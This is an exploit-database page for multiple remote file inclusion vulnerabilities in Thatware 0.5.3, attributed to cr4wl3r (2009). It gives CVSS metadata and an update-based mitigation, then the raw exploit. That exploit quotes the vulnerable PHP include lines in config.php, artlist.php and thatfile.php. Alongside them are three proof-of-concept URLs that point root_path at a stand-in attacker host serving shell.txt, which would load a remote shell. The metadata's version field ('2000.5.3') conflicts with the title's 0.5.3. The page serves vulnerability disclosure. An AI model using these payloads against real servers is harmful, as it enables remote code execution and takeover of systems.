Thatware - exploit.company

vendor:

Thatware

by:

cr4wl3r

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: Thatware

Affected Version From: 2000.5.3

Affected Version To: 2000.5.3

Patch Exists: YES

Related CWE: N/A

CPE: thatware

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Thatware <= 0.5.3 Multiple Remote File Include Exploit

Thatware is vulnerable to multiple remote file include vulnerability. Attacker can exploit this vulnerability by sending malicious payloads to vulnerable parameters. For example, in config.php, line 4, attacker can send malicious payloads to root_path parameter. Similarly, in artlist.php, line 28, attacker can send malicious payloads to root_path parameter. In thatfile.php, line 130, attacker can send malicious payloads to root_path parameter.

Mitigation:

Update to the latest version of Thatware

Source

Exploit-DB raw data:

[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]

########################################################################
#Thatware <= 0.5.3 Multiple Remote File Include Exploit
#Download Script  :  http://sourceforge.net/projects/thatware/files
########################################################################
#
#Vuln : ./thatware_path/config.php (line 4)
#
#      <?php
#        include $root_path."db_settings.php";
#      ?>
#
#PoC  :  http://server/config.php?root_path=http://[attcker]/shell.txt???
#
#Vuln : ./thatware_path/artlist.php (line 28)
#
#      <?php
#        include $root_path.'thatfile.php';
#      ?>
#
#PoC  :  http://server/artlist.php?root_path=http://[attcker]/shell.txt???
#
#Vuln : ./thatware_path/thatfile.php (line 130)
#
#      <?php
#        if(file_exists($root_path.'config.php'))
#	     include($root_path.'config.php');
#      ?>
#
#PoC  :  http://server/thatfile.php?root_path=http://[attcker]/shell.txt???
#
########################################################################
########################################################################
####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
########################################################################
########################################################################


   [ Gorontalo / 2009 ]